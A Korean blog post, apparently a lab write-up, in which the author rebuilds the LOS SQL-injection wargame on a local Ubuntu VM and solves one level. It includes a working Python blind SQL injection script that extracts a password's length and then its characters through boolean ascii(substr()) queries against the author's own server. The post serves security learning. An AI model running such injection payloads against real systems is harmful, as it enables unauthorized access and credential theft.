Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- nurisec
- 연구모임
- 도구모음
- 화학물질안전원
- Los
- 불법유통근절
- suninatas
- HTML
- 정보보안
- UKPT
- 웹 해킹 입문
- codeup
- 불법유통
- UKPT level
- 화학물질불법유통온라인감시단
- MITRE ATT&CK
- Service
- 국정원
- 화학물질
- 여행
- webhacking
- 기타정보
- 파이썬
- PHP
- 12기
- 경기팀
- 프로젝트
- 국가정보원
- 대외활동
- 국가기록원
Archives
- Today
- Total
agencies
[프로젝트] LOS v0.1 본문
rubiya 멘토님께서 화이팅이라고 말씀하셔서...
프로젝트로 LOS 따라하기를 진행하고자 합니다.
홈페이지 프로젝트는 ... 대ㄱ
1. 가상머신 우분투 구축
2. apache / php / sql 설치 및 연동
3. LOS 문제풀이 및 동일한 내용으로 구축하기
https://los.rubiya.kr/gate.php
위 사이트는 진품 LOS 사이트입니다.
위 사이트는 가품 LOS 사이트입니다.
SQL-4 를 확인해보겠습니다.
문제 페이지 이미지
실제 서버 이미지
이런 .. 테이블을 분리하지 않았더니 기존에 있던 admin과 섞이게 되었습니다 ㅠㅠ
user 이름을 수정해야겠습니다. ( newadmin으로 수정했습니다.)
import requests as r
url = "http://192.168.0.24/4.php?pass='or user='newadmin' and "
#길이 검사
for i in range(10,20):
p = "length(pass)={0}%23".format(i)
res = r.get(url+p)
if "HELLO ADMIN" in res.text:
print("The password length : {0}".format(i))
break
flag = ""
#패스워드 검사
for j in range(1,i+1):
for k in range(ord('0'), ord('z')):
p = "user='newadmin' and ascii(substr(pass,{0},1))={1}%23".format(j,k)
res = r.get(url+p)
if "HELLO ADMIN" in res.text:
flag+=chr(k)
print("The password is :",flag)
break
'Ⅲ. 정보보안' 카테고리의 다른 글
[프로젝트] LOS v0.2 (0) | 2024.03.10 |
---|---|
LOS 문제풀이 : orge (0) | 2024.03.09 |
[프로젝트] 홈페이지 구축 (로그인 설정) v0.8 (0) | 2024.03.02 |
[프로젝트] 홈페이지 구축 (검색바 추가 및 XSS방어) v0.7 (0) | 2024.03.02 |
[프로젝트] 홈페이지 구축 (게시판 구축) v0.6 (0) | 2024.03.01 |